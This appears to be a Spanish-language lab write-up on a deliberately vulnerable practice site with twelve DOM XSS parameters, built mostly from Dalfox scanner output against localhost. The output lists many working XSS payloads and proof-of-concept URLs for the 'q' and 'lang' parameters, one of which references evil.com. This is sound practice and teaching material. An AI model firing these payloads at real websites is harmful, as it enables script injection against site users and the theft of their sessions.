12 DOM XSS Parameters for Automated Scanning

12 DOM XSS Parameters for Automated Scanning

12 DOM XSS Parameters for Automated Scanning Red social con 12 parametros diferentes inyectables en el DOM via distintos sinks (innerHTML, document.write, eval, outerHTML, setTimeout, location.replace). Ideal para practicar con herramientas automatizadas como dalfox.

dalfox url http://localhost:1000/
                                                        
               ░█▒               
             ████     ▓                    
           ▓█████  ▓██▓                  
          ████████████         ░          
        ░███████████▓          ▓░     
     ░████████████████        ▒██░    
    ▓██████████▒███████     ░█████▓░    
   ██████████████░ ████        █▓     
 ░█████▓          ░████▒       ░         Dalfox v2.12.0
 █████               ▓██░             
 ████                  ▓██      Powerful open-source XSS scanner       
 ███▓        ▓███████▓▒▓█░     and utility focused on automation.       
 ███▒      █████                     
 ▓███     ██████                    
 ████     ██████▒                
 ░████    ████████▒
 
 🎯  Target                 http://localhost:1000/
 🏁  Method                 GET
 🖥   Performance            100 worker / 1 cpu
 ⛏   Mining                 true (Gf-Patterns, DOM Mining Enabled)
 ⏱   Timeout                10
 📤  FollowRedirect         false
 🕰   Started at             2026-05-26 17:10:08

[*] -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[*] Starting scan [SID:Single] / URL: http://localhost:1000/
[I] Found 4 testing points in DOM-based parameter mining
[I] Content-Type is text/html; charset=utf-8
[I] Reflected q param => \  $  =  +  ,  -  .  ]  :  <  >  "  '  `  ;  |  (  {  }  [  )
    659 line:  Search results for: Dalfox
[I] Reflected lang param => \  +  ,  ]  [  }  {  )  |  (  ;  `  '  "  >  <  .  =  -  $  :
    798 line:      var langVal = 'Dal
[W] Reflected Payload in HTML: q='><embed src=javascript:alert(1)></embed>
    659 line:  Search results for: '><embed src=javascript:alert(1)></embed></h3>
[POC][R][GET][inHTML] http://localhost:1000/?q=%27%3E%3Cembed+src%3Djavascript%3Aalert%281%29%3E%3C%2Fembed%3E
[W] Reflected Payload in HTML: lang=><textarea onfocus=alert(1) autofocus></textarea>
    798 line:      var langVal = '><textarea onfocus=alert(1) autofocus></textarea>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Ctextarea+onfocus%3Dalert%281%29+autofocus%3E%3C%2Ftextarea%3E
[V] Triggered XSS Payload (found DOM Object): q="><IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))" class=dalfox>
    659 line:  Search results for: "><IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83)
[POC][V][GET][inHTML] http://localhost:1000/?q=%22%3E%3CIMG+SRC%3Dx+onpopstate%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><button onfocus=alert(1) autofocus>test</button>
    798 line:      var langVal = '><button onfocus=alert(1) autofocus>test</button>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cbutton+onfocus%3Dalert%281%29+autofocus%3Etest%3C%2Fbutton%3E
[W] Reflected Payload in HTML: lang=><svg><foreignObject><img src=x onerror=alert(1)></foreignObject>
    798 line:      var langVal = '><svg><foreignObject><img src=x onerror=alert(1)></foreignObj
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Csvg%3E%3CforeignObject%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%2FforeignObject%3E
[W] Reflected Payload in HTML: lang="><SvG/onload=alert(1) id=dalfox>
    798 line:      var langVal = '"><SvG/onload=alert(1) id=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3CSvG%2Fonload%3Dalert%281%29+id%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><object data=javascript:alert(1)></object>
    798 line:      var langVal = '><object data=javascript:alert(1)></object>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cobject+data%3Djavascript%3Aalert%281%29%3E%3C%2Fobject%3E
[W] Reflected Payload in HTML: lang=><link rel=preconnect href=//evil.com onload=alert(1) class=dalfox>
    798 line:      var langVal = '><link rel=preconnect href=//evil.com onload=alert(1) class=d
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Clink+rel%3Dpreconnect+href%3D%2F%2Fevil.com+onload%3Dalert%281%29+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><button onfocus=alert(1) autofocus>test</button>
    798 line:      var langVal = ''><button onfocus=alert(1) autofocus>test</button>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Cbutton+onfocus%3Dalert%281%29+autofocus%3Etest%3C%2Fbutton%3E
[W] Reflected Payload in HTML: lang=><select onfocus=alert(1) autofocus><option>test</option></select>
    798 line:      var langVal = '><select onfocus=alert(1) autofocus><option>test</option></se
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cselect+onfocus%3Dalert%281%29+autofocus%3E%3Coption%3Etest%3C%2Foption%3E%3C%2Fselect%3E
[W] Reflected Payload in HTML: lang="><img src=x onerror="requestAnimationFrame(()=>alert(1))" class=dalfox>
    798 line:      var langVal = '"><img src=x onerror="requestAnimationFrame(()=>alert(1))" cl
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3Cimg+src%3Dx+onerror%3D%22requestAnimationFrame%28%28%29%3D%3Ealert%281%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><marquee onstart=alert(1)></marquee>
    798 line:      var langVal = '><marquee onstart=alert(1)></marquee>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cmarquee+onstart%3Dalert%281%29%3E%3C%2Fmarquee%3E
[W] Reflected Payload in HTML: lang="><IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))" class=dalfox>
    798 line:      var langVal = '"><IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))" cl
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3CIMG+SRC%3Dx+onplay%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><embed src=# codebase=javascript:alert(document.domain)// class=dalfox></embed>
    798 line:      var langVal = ''><embed src=# codebase=javascript:alert(document.domain)// c
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Cembed+src%3D%23+codebase%3Djavascript%3Aalert%28document.domain%29%2F%2F+class%3Ddalfox%3E%3C%2Fembed%3E
[W] Reflected Payload in HTML: lang=><form action=javascript:alert(1) class=dalfox><input type=submit></form>
    798 line:      var langVal = '><form action=javascript:alert(1) class=dalfox><input type=su
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Cform+action%3Djavascript%3Aalert%281%29+class%3Ddalfox%3E%3Cinput+type%3Dsubmit%3E%3C%2Fform%3E
[W] Reflected Payload in HTML: lang="><svg onload="[].constructor.constructor('alert(1)')()" class=dalfox>
    798 line:      var langVal = '"><svg onload="[].constructor.constructor('alert(1)')()" clas
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3Csvg+onload%3D%22%5B%5D.constructor.constructor%28%27alert%281%29%27%29%28%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><sVg/onload=alert(1) class=dalfox>
    798 line:      var langVal = ''><sVg/onload=alert(1) class=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3CsVg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang=><keygen onfocus=alert(1) autofocus>
    798 line:      var langVal = '><keygen onfocus=alert(1) autofocus>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%3E%3Ckeygen+onfocus%3Dalert%281%29+autofocus%3E
[W] Reflected Payload in HTML: lang='><img/src/onerror=.1|alert`` class=dalfox>
    798 line:      var langVal = ''><img/src/onerror=.1|alert`` class=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang='><a href='javascript&colon;alert(1)'>click
    798 line:      var langVal = ''><a href='javascript&colon;alert(1)'>click';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick
[W] Reflected Payload in HTML: lang="><IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))" class=dalfox>
    798 line:      var langVal = '"><IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3CIMG+SRC%3Dx+onstorage%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22+class%3Ddalfox%3E
[W] Reflected Payload in HTML: lang="><img src=x onerror="self.alert(1)" class=dalfox>
    798 line:      var langVal = '"><img src=x onerror="self.alert(1)" class=dalfox>';
[POC][R][GET][inHTML] http://localhost:1000/?lang=%22%3E%3Cimg+src%3Dx+onerror%3D%22self.alert%281%29%22+class%3Ddalfox%3E
[V] Triggered XSS Payload (found DOM Object): lang=</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
    798 line:      var langVal = '</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
[POC][V][GET][inHTML] http://localhost:1000/?lang=%3C%2Fscript%3E%3Csvg%3E%3Cscript%2Fclass%3Ddalfox%3Ealert%281%29%3C%2Fscript%3E-%2526apos%3B
[*] -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[*] [duration: 5.136814462s][issues: 23] Finish Scan!

Tal y como nos dice el tip, vamos a usar Dalfox para detectar todos los parámetros en los que podemos inyectar código. Esta herramienta es muy buena para automatizar el proceso.

Podemos probar lo que va encontrando. Si quieres probar Dalfox => https://github.com/hahwul/dalfox